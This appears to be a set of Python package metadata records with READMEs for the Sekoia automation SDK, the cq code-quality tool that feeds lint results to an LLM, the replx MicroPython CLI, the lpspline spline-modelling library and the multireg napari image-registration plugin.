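This is why importing the module (not the constant itself) keeps `constants.DATA_STORAGE` easy to patch in tests.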
When attaching a single file to a playbook run, you can use the `write` function to create the file:
```python
import os

from sekoia_automation.storage import write
from sekoia_automation.trigger import Trigger


class MyTrigger(Trigger):
    def run(self):
        while True:
            # Simple creation of a file
            filepath = write('test.txt', {'event': 'data'})

            # Attach the file to the event
            self.send_event('event_name', {'file_path': os.path.basename(filepath)},
                            os.path.dirname(filepath))
            # Maybe wait some time
```
### Persisting data to disk
Most of the time, triggers have to maintain some state to do their work properly (such as a cursor).
To make sure that this data survives a restart of the trigger (which can happen at any time),
it is useful to persist it to the trigger's storage.
When the manipulated data is JSON serializable, it is recommended to use the `PersistentJSON` class to do
so (instead of `shelve`). Used as a context manager, this class will make sure the python dict is properly
synchronised:
```python
from sekoia_automation.trigger import Trigger
from sekoia_automation.storage import PersistentJSON


class MyTrigger(Trigger):
    def run(self):
        while True:
            # Read and update state
            with PersistentJSON('cache.json') as cache:
                # Use cache as you would use a normal python dict
                cache['cursor'] = 'some-value'
```
## Create an action
Here is how you could define a very basic action that simply adds its arguments as result:
```python
from sekoia_automation.module import Module
from sekoia_automation.action import Action


class MyAction(Action):
    def run(self, arguments):
        return arguments  # Return value should be a JSON serializable dict


if __name__ == "__main__":
    module = Module()
    module.register(MyAction)
    module.run()
```
There are a few more things you can do within an Action:
* Access the Module's configuration with `self.module.configuration`
* Add log messages with `self.log('message', 'level')`
* Activate an output branch with `self.set_output('malicious')` or explicitly disable another with `self.set_output('benign', False)`
* Raise an error with `self.error('error message')`. Note that raised exceptions that are not caught by your code will be automatically handled by the SDK
### Working with files
Actions can read and write files the same way a Trigger can:
```python
import os

from sekoia_automation import constants

filepath = os.path.join(constants.DATA_STORAGE, "test.txt")
```
It is a common pattern to accept JSON argument values directly or inside a file. The SDK provides a helper to easily read such arguments:
```python
class MyAction(Action):
    def run(self, arguments):
        test = self.json_argument("test", arguments)

        # Do something with test
```
The value will automatically be fetched from `test` if present, or read from the file at `test_path`.
The SDK also provides a helper to do the opposite with results:
```python
class MyAction(Action):
    def run(self, arguments):
        return self.json_result("test", {"some": "value"})
```
This will create a dict with a `test_path` key by default, or a `test` key if the original argument was passed directly.
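As an illustration of the argument-reading side of this pattern, here is a minimal standalone sketch. It re-implements the behaviour described above (prefer the inline value, else read the file at `<name>_path`); it is not the SDK's actual code:

```python
import json
import tempfile

def json_argument(name, arguments):
    # Illustrative re-implementation of the pattern (not the SDK's code):
    # prefer the inline value, else read JSON from the `<name>_path` file
    if name in arguments:
        return arguments[name]
    with open(arguments[f"{name}_path"]) as f:
        return json.load(f)

# Inline value is used directly
assert json_argument("test", {"test": {"a": 1}}) == {"a": 1}

# Otherwise the value is read from the file referenced by `test_path`
with tempfile.NamedTemporaryFile("w", suffix=".json", delete=False) as tmp:
    json.dump({"b": 2}, tmp)
assert json_argument("test", {"test_path": tmp.name}) == {"b": 2}
```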
## Same Docker Image for several items
In most cases, it makes sense to define several triggers and / or actions sharing the same code and the same docker image.
In this case, here is how you should define the main:
```python
if __name__ == "__main__":
    module = Module()
    module.register(Trigger1, "command_trigger1")
    module.register(Trigger2, "command_trigger2")
    module.register(Action1, "command_action1")
    module.register(Action2, "command_action2")
    module.run()
```
The corresponding commands need to be correctly set in the manifests as "docker_parameters".
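For example, a trigger manifest could reference its command like this (a minimal sketch; any field other than `docker_parameters` is an assumption about your manifest layout):

```json
{
  "name": "Trigger 1",
  "docker_parameters": "command_trigger1"
}
```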
## Use with Pydantic
It is recommended to use Pydantic to develop new modules. This should ease development.
### Module Configuration
A pydantic model can be used as `self.module.configuration` by adding type hints:
```python
class MyConfigurationModel(BaseModel):
    field: str


class MyModule(Module):
    configuration: MyConfigurationModel


class MyAction(Action):
    module: MyModule
```
### Triggers
The Trigger configuration can also be a pydantic model by adding a type hint:
```python
class MyTrigger(Trigger):
    configuration: MyConfigurationModel
```
You can also specify the model of created events by setting the `results_model` attribute:
```python
class Event(BaseModel):
    field: str = "value"


class MyTrigger(Trigger):
    results_model = Event
```
### Actions
You can use a pydantic model as action arguments by adding a type hint:
```python
class ActionArguments(BaseModel):
    field: str = "value"


class MyAction(Action):
    def run(self, arguments: ActionArguments):
        ...
```
The model of results can also be specified by setting the `results_model` attribute:
```python
class Results(BaseModel):
    field: str = "value"


class MyAction(Action):
    results_model = Results
```
### Automatically generating manifests
When using pydantic models to describe configurations, arguments and results, manifests
can be automatically generated:
```
$ uv run sekoia-automation generate-files
```
This will do the following:
* Generate `main.py`
* Generate a manifest for each action
* Generate a manifest for each trigger
* Update the module's manifest
For better results, it is recommended to set the `name` and `description` attributes in Actions
and Triggers.
| text/markdown | Sekoia.io | null | null | null | null | SDK, Sekoia.io, automation, playbook | [
"Intended Audience :: Developers",
"License :: OSI Approved :: MIT License",
"Natural Language :: English",
"Topic :: Security",
"Topic :: Software Development :: Libraries"
] | [] | null | null | <4,>=3.11 | [] | [] | [] | [
"aiobotocore<3,>=2.20.0",
"aiocsv<2,>=1.2.4",
"aiofiles<24,>=23.1.0",
"aiohttp<4,>=3.8.4",
"aiolimiter<2,>=1.1.0",
"black>=25.11.0",
"boto3<2,>=1.36.23",
"cachetools>=6.2.3",
"cookiecutter<3,>=2.1",
"flask<4,>=3.1.2",
"jinja2<4,>=3.0.3",
"jsonschema<5,>=4.22.0",
"loguru<0.8,>=0.7.0",
"orjson<4,>=3.8",
"prometheus-client",
"pydantic<3,>=2.10",
"python-slugify<6,>=5.0.2",
"pyyaml<7,>=6.0",
"requests-ratelimiter<0.8,>=0.7.0",
"requests<3,>=2.25",
"s3path<0.7,>=0.6.4",
"sentry-sdk",
"tenacity",
"typer>=0.20",
"uv"
] | [] | [] | [] | [
"Homepage, https://sekoia.io/",
"Repository, https://github.com/SEKOIA-IO/sekoia-automation-sdk",
"Documentation, https://docs.sekoia.io/"
] | uv/0.10.4 {"installer":{"name":"uv","version":"0.10.4","subcommand":["publish"]},"python":null,"implementation":{"name":null,"version":null},"distro":{"name":"Ubuntu","version":"24.04","id":"noble","libc":null},"system":{"name":null,"release":null},"cpu":null,"openssl_version":null,"setuptools_version":null,"rustc_version":null,"ci":true} | 2026-02-20T09:21:23.702338 | sekoia_automation_sdk-1.22.3-py3-none-any.whl | 94,545 | 66/20/9f7fef193733a739f3f8728a5b9e2b79f73772cacdca3bed34b47b96cc5e/sekoia_automation_sdk-1.22.3-py3-none-any.whl | py3 | bdist_wheel | null | false | 469c064bad323d4fbc961c02b47f340a | 3d19bad210b9baf051ca54fbeb47b83084ce16d5586e693b1a6268bce698df8f | 66209f7fef193733a739f3f8728a5b9e2b79f73772cacdca3bed34b47b96cc5e | MIT | [
"LICENSE"
] | 253 |
2.4 | python-code-quality | 0.1.8 | Python Code Quality Analysis Tool - feed the results from 11 CQ tools straight into an LLM. Minimal tokens. | # CQ - Python Code Quality Analysis Tool
Feed the results from 11+ code quality tools to an LLM. Minimal tokens.
The primary workflow is:
```bash
# get the single most critical defect as markdown
cq check . -o llm
```
Selects the single most critical defect using this priority order:
1. **Severity** — tools with score below `error_threshold` come before those only below `warning_threshold`
2. **Order** — among tools at the same severity, lower-order tools win (compile before lint before style)
3. **Score** — among ties, the lower score wins
The code context is expanded if available.
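The selection rule above amounts to a lexicographic comparison; a standalone sketch (field names are illustrative, not cq's internals):

```python
# Each candidate defect carries a severity bucket (0 = below the error
# threshold, 1 = only below the warning threshold), the tool's order,
# and the tool's score.
defects = [
    {"tool": "ruff",    "severity": 1, "order": 3, "score": 0.95},
    {"tool": "compile", "severity": 0, "order": 1, "score": 0.80},
    {"tool": "bandit",  "severity": 0, "order": 2, "score": 0.70},
]

# severity first, then tool order, then the lower score breaks remaining ties
top = min(defects, key=lambda d: (d["severity"], d["order"], d["score"]))
print(top["tool"])  # compile: among error-level tools, the lowest order wins
```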
```md
`data/problems/travelling_salesman/ts_bad.py:21` — **F841**: Local variable `unused_variable` is assigned to but never used
18: min_dist = float("inf")
19: nearest_city = None
20: for city in cities:
21: unused_variable = 67
22: dist = calc_dist(current_city, city)
23: if dist < min_dist:
24: min_dist = dist
25: nearest_city = city
Please fix only this issue. After fixing, run `cq check . -o llm` to verify.
```
Feed to an LLM with edit tools and repeat until there are no issues, e.g.
```python
cq check . -o llm | claude -p "fix this"
# or
cq check . -o llm | ollama gpt-oss:20b "Explain how to fix this"
```
## Install
```bash
# install the `cq` command line tool from PyPI
uv tool install python-code-quality
# or, clone it then install
git clone https://github.com/rhiza-fr/py-cq.git
cd py-cq
uv tool install .
```
## Tools
These tools are run in **parallel**, except when looking for the first error in `-o llm` mode:
| Order | Tool | Measures |
|----------|------|----------|
| 1 | compileall | Syntax errors |
| 2 | bandit | Security vulnerabilities |
| 3 | ruff | Lint / style |
| 4 | ty | Type errors |
| 5 | pytest | Test pass rate |
| 6 | coverage | Test coverage |
| 7 | radon cc | Cyclomatic complexity |
| 8 | radon mi | Maintainability index |
| 9 | radon hal | Halstead volume / bug estimate |
| 10 | vulture | Dead code |
| 11 | interrogate | Docstring coverage |
Diskcache is used to cache tool output for lightning-fast re-runs. Sane defaults: <100 MB, <5 days, no pickle.
## Usage
```bash
cq check . # Table overview of scores for humans
cq check -o llm # Top defect as markdown for LLMs
cq check . -o score # Numeric score only for CI
cq check . -o json # Detailed parsed JSON output for jq
cq check . -o raw # Raw tool output for debug
cq check path/to/file.py # Just one file (skips pytest and coverage)
cq check . --workers 1 # Run sequentially if you like things slow
cq check . --clear-cache # Clear cached results before running (rarely needed)
cq config path/to/project/ # Show effective tool configuration
```
## Table output
```bash
> cq check .
```
```python
┏━━━━━━━━━━━━━━━━━━┳━━━━━━━━━━┳━━━━━━━━━━━━━━━━━━━━━━━━━━━┳━━━━━━━━━┳━━━━━━━━━━┓
┃ Tool ┃ Time ┃ Metric ┃ Score ┃ Status ┃
┡━━━━━━━━━━━━━━━━━━╇━━━━━━━━━━╇━━━━━━━━━━━━━━━━━━━━━━━━━━━╇━━━━━━━━━╇━━━━━━━━━━┩
│ compile │ 0.42s │ compile │ 1.000 │ OK │
│ bandit │ 0.56s │ security │ 1.000 │ OK │
│ ruff │ 0.17s │ lint │ 1.000 │ OK │
│ ty │ 0.33s │ type_check │ 1.000 │ OK │
│ pytest │ 0.91s │ tests │ 1.000 │ OK │
│ coverage │ 1.26s │ coverage │ 0.910 │ OK │
│ radon cc │ 0.32s │ simplicity │ 0.982 │ OK │
│ radon mi │ 0.38s │ maintainability │ 0.869 │ OK │
│ radon hal │ 0.30s │ file_bug_free │ 0.928 │ OK │
│ radon hal │ │ file_smallness │ 0.851 │ OK │
│ radon hal │ │ functions_bug_free │ 0.913 │ OK │
│ radon hal │ │ functions_smallness │ 0.724 │ OK │
│ vulture │ 0.32s │ dead_code │ 1.000 │ OK │
│ interrogate │ 0.36s │ doc_coverage │ 1.000 │ OK │
│ │ │ Score │ 0.965 │ │
└──────────────────┴──────────┴───────────────────────────┴─────────┴──────────┘
```
## Single score output
```bash
> cq check . -o score
```
```python
0.9662730667181059 # this is designed to approach but not reach 1.0
```
## Json output
```bash
> cq check . -o json
```
```json
[
{
"tool_name": "compile",
"metrics": {
"compile": 1.0
},
"details": {},
"duration_s": 0.05611889995634556
}
...
]
```
## Raw output
```bash
> cq check -o raw
```
```json
[
{
"tool_name": "compile",
"command": "D:\\ai\\py-cq\\.venv\\Scripts\\python.exe -m compileall -r 10 -j 8 . -x .*venv",
"stdout": "",
"stderr": "",
"return_code": 0,
"timestamp": "2026-02-20 10:01:22"
}
...
]
```
## Configuration
Add a `[tool.cq]` section to your project's `pyproject.toml`:
```toml
[tool.cq]
# Skip tools that are slow or not relevant to your project
disable = ["coverage", "interrogate"]
# Override warning/error thresholds per tool
[tool.cq.thresholds.coverage]
warning = 0.9
error = 0.7
```
Tool IDs match the keys in `config/tools.yaml`: `compilation`, `bandit`, `ruff`, `ty`, `pytest`, `coverage`, `complexity`, `maintainability`, `halstead`, `vulture`, `interrogate`.
### Default config
```yaml
tools:
  compilation:
    name: "compile"
    command: "{python} -m compileall -r 10 -j 8 {context_path} -x .*venv"
    parser: "CompileParser"
    order: 1
    warning_threshold: 0.9999
    error_threshold: 0.9999
  bandit:
    name: "bandit"
    command: "{python} -m bandit -r {context_path} -f json -q -s B101 --severity-level medium --exclude {input_path_posix}/.venv,{input_path_posix}/tests"
    parser: "BanditParser"
    order: 2
    warning_threshold: 0.9999
    error_threshold: 0.8
  ruff:
    name: "ruff"
    command: "{python} -m ruff check --output-format concise --no-cache {context_path}"
    parser: "RuffParser"
    order: 3
    warning_threshold: 0.9999
    error_threshold: 0.9
  ty:
    name: "ty"
    command: "{python} -m ty check --output-format concise --color never {context_path}"
    parser: "TyParser"
    order: 4
    warning_threshold: 0.9999
    error_threshold: 0.8
    run_in_target_env: true
    extra_deps:
      - ty
  pytest:
    name: "pytest"
    command: "{python} -m pytest -v {context_path}"
    parser: "PytestParser"
    order: 5
    warning_threshold: 0.7
    error_threshold: 0.5
    run_in_target_env: true
  coverage:
    name: "coverage"
    command: "{python} -m coverage run --omit=*/tests/*,*/test_*.py -m pytest {context_path} && {python} -m coverage report --omit=*/tests/*,*/test_*.py"
    parser: "CoverageParser"
    order: 6
    warning_threshold: 0.9
    error_threshold: 0.5
    run_in_target_env: true
    extra_deps:
      - coverage
      - pytest
  complexity:
    name: "radon cc"
    command: "{python} -m radon cc --json {context_path}"
    parser: "ComplexityParser"
    order: 7
    warning_threshold: 0.6
    error_threshold: 0.4
  maintainability:
    name: "radon mi"
    command: "{python} -m radon mi -s --json {context_path}"
    parser: "MaintainabilityParser"
    order: 8
    warning_threshold: 0.6
    error_threshold: 0.4
  halstead:
    name: "radon hal"
    command: "{python} -m radon hal -f --json {context_path}"
    parser: "HalsteadParser"
    order: 9
    warning_threshold: 0.5
    error_threshold: 0.3
  vulture:
    name: "vulture"
    command: "{python} -m vulture {context_path} --min-confidence 80 --exclude .venv,dist,.*_cache,docs,.git"
    parser: "VultureParser"
    order: 10
    warning_threshold: 0.9999
    error_threshold: 0.8
  interrogate:
    name: "interrogate"
    command: "{python} -m interrogate {context_path} -v --fail-under 0"
    parser: "InterrogateParser"
    order: 11
    warning_threshold: 0.8
    error_threshold: 0.3
```
## Respect
Many thanks to all the wonderful maintainers of :
- [compileall](https://docs.python.org/3/library/compileall.html)
- [bandit](https://github.com/PyCQA/bandit)
- [ruff](https://github.com/astral-sh/ruff)
- [ty](https://github.com/astral-sh/ty)
- [pytest](https://github.com/pytest-dev/pytest)
- [coverage.py](https://github.com/nedbat/coveragepy)
- [radon](https://github.com/rubik/radon)
- [vulture](https://github.com/jendrikseipp/vulture)
- [interrogate](https://github.com/econchick/interrogate)
- [diskcache](https://github.com/grantjenks/python-diskcache)
- [typer](https://github.com/fastapi/typer)
| text/markdown | null | Chris Kilner <chris@rhiza.fr> | null | null | null | null | [] | [] | null | null | >=3.12 | [] | [] | [] | [
"bandit>=1.8.0",
"coverage>=7.8.2",
"diskcache>=5.6.3",
"interrogate>=1.7.0",
"pytest-cov>=6.1.1",
"pytest-json-report>=1.5.0",
"pytest>=8.4.0",
"pyyaml>=6.0.2",
"radon>=6.0.1",
"rich>=14.0.0",
"ruff>=0.14.1",
"ty>=0.0.17",
"typer>=0.16.0",
"vulture>=2.14"
] | [] | [] | [] | [
"Homepage, https://github.com/rhiza-fr/py-cq",
"Repository, https://github.com/rhiza-fr/py-cq"
] | twine/6.1.0 CPython/3.13.7 | 2026-02-20T09:21:07.930135 | python_code_quality-0.1.8.tar.gz | 64,655 | f0/33/2c9be68ffd315c14f9209d2f498439a1358129788600ae41fe42103b6fbc/python_code_quality-0.1.8.tar.gz | source | sdist | null | false | 8220c1ce25b89015ae1d1d43b15e83bb | a7b099edfee7e707ad72f5e28506505a12e15a88e7d262e05a7e8833c8412bd4 | f0332c9be68ffd315c14f9209d2f498439a1358129788600ae41fe42103b6fbc | MIT | [
"LICENSE"
] | 203 |
2.4 | replx | 1.2 | replx is a fast, modern MicroPython CLI: turbo REPL, robust file sync (put/get), project install, mpy-cross integration, and smart port discovery. | # replx
[](https://badge.fury.io/py/replx)
[](https://www.python.org/downloads/)
[](https://opensource.org/licenses/MIT)
`replx` is a CLI tool for MicroPython development. It uses an agent-based architecture to manage multiple CLI sessions and multiple boards in a consistent workflow.
## What replx provides
- Shared connection management across terminal sessions
- Foreground and background board handling per session
- Workspace-level default device configuration
- File operations on device storage
- Script execution, REPL access, and utility commands
## Installation
```sh
pip install replx
```
## Command summary
### Connection and session
- `setup`: Initialize workspace settings and register a default device.
- `scan`: List available serial devices.
- `status`: Show session and connection state.
- `fg`: Change the foreground device for the current session.
- `whoami`: Show the current foreground device.
- `disconnect`: Close a device connection.
- `shutdown`: Stop the agent and clear active sessions.
### Execution and interaction
- `exec` (`-c`): Execute inline Python code on the device.
- `run`: Run a local or device-side script.
- `repl`: Open an interactive REPL session.
- `shell`: Open a device file-system shell.
### File operations
- `ls`: List files and directories.
- `cat`: Print file content.
- `get`: Download files from device to local.
- `put`: Upload files from local to device.
- `cp`: Copy files or directories on device.
- `mv`: Move or rename files or directories on device.
- `rm`: Remove files or directories on device.
- `mkdir`: Create directories on device.
- `touch`: Create an empty file or update timestamps.
### Device management
- `usage`: Show device storage usage.
- `reset`: Perform a soft reset.
- `format`: Format the device file system.
- `init`: Run initialization scripts on device.
- `wifi`: Manage Wi-Fi configuration and status.
- `firmware`: Check, download, or update firmware.
### Package and build
- `pkg`: Search, download, and update packages.
- `mpy`: Compile `.py` files to `.mpy`.
## Notes
- `scan`, `status`, `whoami`, and `shutdown` are special commands and do not accept `--port`.
- Most device commands can omit the port when a foreground or workspace default device is available.
## License
MIT
| text/markdown | null | "chanmin.park" <devcamp@gmail.com> | null | null | null | micropython, repl, serial, pyserial, typer, mpy-cross, deploy | [
"Environment :: Console",
"Programming Language :: Python :: 3",
"Programming Language :: Python :: 3 :: Only",
"Operating System :: OS Independent",
"Topic :: Software Development :: Embedded Systems",
"Topic :: System :: Hardware :: Universal Serial Bus (USB)"
] | [] | null | null | >=3.10 | [] | [] | [] | [
"typer>=0.12",
"rich>=13.0",
"pyserial>=3.5",
"mpy-cross>=1.26",
"psutil>=5.9.0"
] | [] | [] | [] | [
"Homepage, https://github.com/PlanXLab/replx",
"Repository, https://github.com/PlanXLab/replx",
"Issues, https://github.com/PlanXLab/replx/issues"
] | twine/6.2.0 CPython/3.14.2 | 2026-02-20T09:20:57.244614 | replx-1.2.tar.gz | 265,772 | 16/80/9826292012cc37bf7dcd2cedc2aeb9b6e561987942e3fa1cb42e7fc80f45/replx-1.2.tar.gz | source | sdist | null | false | e07616e7f8d23cd0b18f73caad12fd14 | dba0bc5f99cd33449afbd3552a3e8405efb357f1eba7b8b3c401029997a20bd6 | 16809826292012cc37bf7dcd2cedc2aeb9b6e561987942e3fa1cb42e7fc80f45 | MIT | [
"LICENSE"
] | 218 |
2.4 | lpspline | 0.0.3 | lpspline | # LPSpline
LPSpline is a Python package for building and optimizing linear spline models using an intuitive additive API. It provides a flexible way to model non-linear relationships using various spline types like Piecewise Linear, B-Splines, Cyclic Splines, and Categorical Factors.
## Installation
Install `lpspline` via pip:
```bash
pip install lpspline
```
## Quick Start
LPSpline allows you to easily compose additive models. Here's a quick example:
```python
import numpy as np
import polars as pl
from lpspline import l, pwl, bs, cs, f, plot_components
# ---------------------------------------- Data Generation
n = 1000
# Regressors
x_linear = np.linspace(0, 10, n)
x_pwl = np.linspace(0, 10, n)
x_bs = np.linspace(0, 10, n)
x_cyc = np.linspace(0, 2*np.pi, n)
x_factor = np.random.randint(0, 3, n)
# Target
y_linear = 0.5 * x_linear
y_pwl = np.where(x_pwl < 5, 0, x_pwl - 5)
y_bs = np.sin(x_bs)
y_cyc = np.cos(x_cyc)
y_factor = np.array([0, 2, -1])[x_factor]
y = y_linear + y_pwl + y_bs + y_cyc + y_factor + np.random.normal(0, 0.2, n)
df = pl.DataFrame({
"linear_col": x_linear,
"pwl_col": x_pwl,
"bs_col": x_bs,
"cyc_col": x_cyc,
"factor_col": x_factor,
"target": y
})
# ---------------------------------------- Model Definition
model = (
l(term='linear_col', bias=True)
+ pwl(term='pwl_col', knots=[5.])
+ bs(term="bs_col", knots=np.linspace(0, 10, 5), degree=3)
+ cs(term="cyc_col", period=2*np.pi, order=2)
+ f(term="factor_col", n_classes=3)
)
# ---------------------------------------- Model Fitting
model.fit(df, df["target"])
# ---------------------------------------- Model Prediction
predictions = model.predict(df)
# ---------------------------------------- Model Visualization
plot_components(model=model, df=df, ncols=3)
```
## Expected output
Once the model is fitted, you will see a detailed summary to the console:
```
==================================================
✨ Model Summary ✨
==================================================
Problem Status: ✅ optimal
--------------------------------------------------
Spline Type | Term | Params
--------------------------------------------------
🟢 Linear | linear_col | 2
🟢 PiecewiseLinear | pwl_col | 3
🟢 BSpline | bs_col | 1
🟢 CyclicSpline | cyc_col | 5
🟢 Factor | factor_col | 3
--------------------------------------------------
📊 Total Parameters | 14
==================================================
Model fitted successfully.
```

| text/markdown | clarkmaio | maioliandrea0@gmail.com | null | null | null | null | [
"Programming Language :: Python :: 3",
"License :: OSI Approved :: MIT License",
"Operating System :: OS Independent",
"Topic :: Scientific/Engineering :: Visualization"
] | [] | https://github.com/clarkmaio/lpspline | null | >=3.10 | [] | [] | [] | [
"polars",
"cvxpy",
"pimpmyplot",
"matplotlib"
] | [] | [] | [] | [] | twine/6.2.0 CPython/3.10.9 | 2026-02-20T09:19:41.341427 | lpspline-0.0.3.tar.gz | 11,668 | 1b/d8/dc0ec42c2790db65c3e4443f2c76e73bd1f475bc6a9b36ab7fc7fcd761e4/lpspline-0.0.3.tar.gz | source | sdist | null | false | 966cefbd8476d249b70fdeaab3fddea7 | f633cd817b50561c3866e88ee8be32945495bd68b7e5f21ab9f4b2cac3758819 | 1bd8dc0ec42c2790db65c3e4443f2c76e73bd1f475bc6a9b36ab7fc7fcd761e4 | null | [
"LICENSE"
] | 213 |
2.1 | multireg | 0.0.19 | Registration of 3D multiplex images with one common channel | # multireg
[](https://gitlab.pasteur.fr/gletort/multireg/blob/main/LICENSE)
[](https://pypi.org/project/multireg)
[](https://python.org)
[](https://napari-hub.org/plugins/multireg)
Registration of 3D multiplex images with one common channel, based on itk-elastix.
Napari plugin to align 3D stacks that share one common field of view in one channel, which is used to calculate the alignment. The plugin will apply the registration to all other channels and output one final stack with all the aligned channels.
The stacks **must have one common channel** (typically cell junctions and nuclei) that is used to calculate the registration transformation. A stack can be rotated, translated, deformed, and have a wider field of view.
The calculated transformation is then applied to all the other channels of each stack.
The final result is **one multi-channel 3D stack**: the first channel is an average (or not) of the common channel, and each other channel is a registered channel from the input stacks. The common channel can be averaged between the different stacks, which improves its quality.
The plugin saves and loads files to a folder named `aligned`, created in the same directory as the source images.
An example use case for this module is imaging the same cells with washing or moving of the sample in between acquisitions. The corresponding cells will not be at the same position in the new stacks, and can even be deformed by the procedure. This plugin realigns the images based on one common channel on which the transformation is calculated.
----------------------------------
## Installation
* You can install the plugin directly in `Napari` by going to `Plugins>Install/Uninstall plugins` and search for `multireg`
* Or you can install `multireg` via [pip]:
pip install multireg
## Usage
You can launch `multireg` in napari by going to `Plugins>multireg: do multiplex registration`.
### Fixed image
It will open a prompt to ask you to select the reference (fixed) image, compared to which all other images will be aligned.
Then you have to choose the `reference channel` that will be used in all the stacks to calculate the alignment, so this channel should be common to all stacks.

#### Reference points
The first part of the registration relies on manually selected reference points, because the common fields of view can be quite far apart in the acquisitions. So first an affine registration is applied to bring the regions of interest of the two stacks close to each other.
<br> *Note that if your stacks did not move a lot, you could calculate the transformation without using the reference points. There's an option in the alignment calculation panel for this.*

You have to manually place a few reference points (4-5 should be enough). Try to spread them in the image (in x, y and z) on landmarks that you can recognize in the other images.
To add a new reference point, click on the "plus" sign in the left panel. To select one, click on the arrow icon (or press 3), then on the point. You can move the point in x and y. To move it in z, press `u` for up and `d` for down.
When all points are placed, save them. The **points have to be saved** to be correctly loaded by the alignment calculation step.
Then click on `Fixed points done` to continue to the next step.
### Moving images
Then you can choose one of the images you want to align with the reference image. The channel it has in common with the fixed image should be the same `reference channel` selected in the first step. Select the file of the moving image to align by clicking on `select file`. This will open the new image and go to the step of placing the moving points in this image.
When you have processed all the moving images, you can click on `All done` to finish by creating the [resulting stack](#create-resulting-image).

#### Moving points
You now have to locate where the region of interest (the fixed image) is in your new image, and find where the landmarks referenced in the fixed image are in this new image. This allows the plugin to bring the regions of interest of the two images together in a first step, before fine-tuning the registration.
For each point placed in the fixed image, place the corresponding point in the moving image. By default, the moving points are placed close to the fixed points.
* Each point must have the same label (number) as its corresponding fixed point so they can be associated correctly. You can change a point's label by selecting it, entering the new value in `param`, and clicking on `update`.
* When a point is selected, you can drag it to its desired location. To move it in the Z direction, press `u` to move it to the next Z slice (up) and `d` to the previous one (down). The viewed slice will follow the point's new position as you do so.
* You can click on `side_by_side_view` to see the two images (fixed and moving) with their placed points at the same time.
* You can click on `two_windows_view` to see the fixed image and points in a separate Napari window. This lets you visualize the fixed and moving images and points separately, and thus use a different z-slice or zoom level for each image. The new window is closed automatically by the plugin if you unselect this option or when you click on `Moving done`.

When all the moving points have been correctly placed, click on `Save points` to save these positions so they can be used by the alignment step. The points **have to be saved** in the point file to be correctly loaded by the alignment step.
### Alignment calculation
This step is the core of the plugin. The transformation needed to warp the moving image to match the fixed image on the `reference chanel` is calculated with the [itk-elastix](https://pypi.org/project/itk-elastix/) Python module. It is decomposed into two steps.
1. First, a global **affine registration** is performed, based on the correspondence between the reference and moving points (`do rigid` option). This locates the fixed image's position within the moving image and applies a first **shearing, scaling, rotation and translation** to superimpose the regions of interest.
2. The second step fine-tunes the registration. It no longer uses the reference points (unless the rigid transformation was not selected) but calculates the matching based on the images' local intensities. A **non-rigid transformation** based on B-splines is performed at this step, compensating for **local deformations** in the moving image (`do bspline` option).
The option `use reference points` determines whether the previously placed reference points should be used, or whether the registration should rely only on intensity matching. Using only the intensities is possible if the two images are not too far from each other. When both transformations are selected, the reference points are used only in the first pass (either rigid or bspline). If only one is selected, the points are used for that transformation.
The option `strong_weight_points` gives more importance to the reference points than to intensity matching when calculating the registration: the weights are 0.2 for the intensity metric and 0.8 for the points metric. Note that if both rigid and bspline transformations are selected, the second transformation (bspline) does not use the points.

You can click on `show advanced parameters` to tune the parameters of the non-rigid transformation. After calculating the registration, the plugin adds a new layer showing the moving image after alignment, so you can check the success of the registration. `show intermediate_layer` will also add the moving image aligned after the first step only (the point matching with affine registration).
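The first, point-based pass boils down to a least-squares affine fit between the two point sets. A minimal NumPy sketch of that idea (illustrative only — the plugin delegates the actual registration to itk-elastix, and the function names here are made up):

```python
import numpy as np

def fit_affine(fixed_pts, moving_pts):
    """Least-squares 3D affine transform (4x3 matrix) mapping moving points onto fixed points."""
    moving = np.asarray(moving_pts, dtype=float)
    fixed = np.asarray(fixed_pts, dtype=float)
    # Augment with a column of ones so the translation is estimated too.
    A = np.hstack([moving, np.ones((len(moving), 1))])
    M, *_ = np.linalg.lstsq(A, fixed, rcond=None)
    return M

def apply_affine(M, pts):
    pts = np.asarray(pts, dtype=float)
    return np.hstack([pts, np.ones((len(pts), 1))]) @ M

# 4-5 well-spread, non-coplanar points are enough to constrain the 12 parameters.
moving = np.array([[0, 0, 0], [10, 0, 0], [0, 10, 0], [0, 0, 5], [10, 10, 5]], float)
fixed = moving @ np.diag([1.1, 0.9, 1.0]) + np.array([3.0, -2.0, 1.0])  # known transform
M = fit_affine(fixed, moving)
print(np.allclose(apply_affine(M, moving), fixed))  # True
```

This is why spreading the points in x, y and z matters: coplanar or clustered points leave the fit under-constrained.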

### Apply alignment
Once the calculated registration is satisfactory, you can apply it to all the channels of your moving image, or only to a few. By default, all channels are selected in the `Apply alignement` panel, but you can unselect the channels that you don't want to align in the `align chanels` parameter.
When you click on `Align images`, the plugin applies the transformation to the selected channels of the moving image and saves each of them in the `aligned` folder as individual `.tif` files.

### Create resulting image
This step saves a single 3D multi-channel stack containing all the aligned channels.
The common channel present in all the images can be averaged after alignment to obtain a much less noisy image. By default, the aligned `reference chanel` of all the images is averaged to create the first channel of the final image. However, you can unselect some images in the first panel (`average chanels` parameter) if you do not wish to use all the images, or do not want an average at all.

Then every aligned channel of each image, other than the reference channel, is stacked into the final resulting image. Here too, if you don't want to keep all the other channels in the resulting image, you can unselect the ones that you don't want stacked in the `add_chanels` parameter.
All the aligned channels were previously saved in the `aligned` folder. If `delete_files` is checked (the default), all these intermediate files are deleted and only the final resulting stack is kept in that folder.
You will end up with a final 3D multi-channel stack, saved as a `.tif` file in the `aligned` folder, with the same name as your fixed image. It can have many channels if you stacked multiple images together.
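In NumPy terms, the averaging and stacking described above amount to something like the following sketch (array names and shapes are made up for illustration; the plugin itself works on the saved `.tif` files):

```python
import numpy as np

z, y, x = 4, 32, 32
rng = np.random.default_rng(0)
# Hypothetical aligned reference channels from three images:
ref_channels = [rng.random((z, y, x), dtype=np.float32) for _ in range(3)]
# Averaging n aligned copies reduces uncorrelated noise roughly by sqrt(n).
reference = np.mean(ref_channels, axis=0)

# Hypothetical remaining aligned channels to keep in the result:
other_channels = [rng.random((z, y, x), dtype=np.float32) for _ in range(2)]
# Final multi-channel stack, channel axis first: (C, Z, Y, X)
result = np.stack([reference, *other_channels], axis=0)
print(result.shape)  # (3, 4, 32, 32)
```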
In napari, you can separate the channels by right-clicking on the layer and selecting `Split stack`.
In Fiji, you can convert the stack to a composite to view the channels in different colors.

## License
Distributed under the terms of the [BSD-3] license,
"multireg" is free and open source software.
## Plugin initialization
This [napari] plugin was generated with [Cookiecutter] using [@napari]'s [cookiecutter-napari-plugin] template.
## Issues
If you encounter any problems, please [file an issue] along with a detailed description.
[napari]: https://github.com/napari/napari
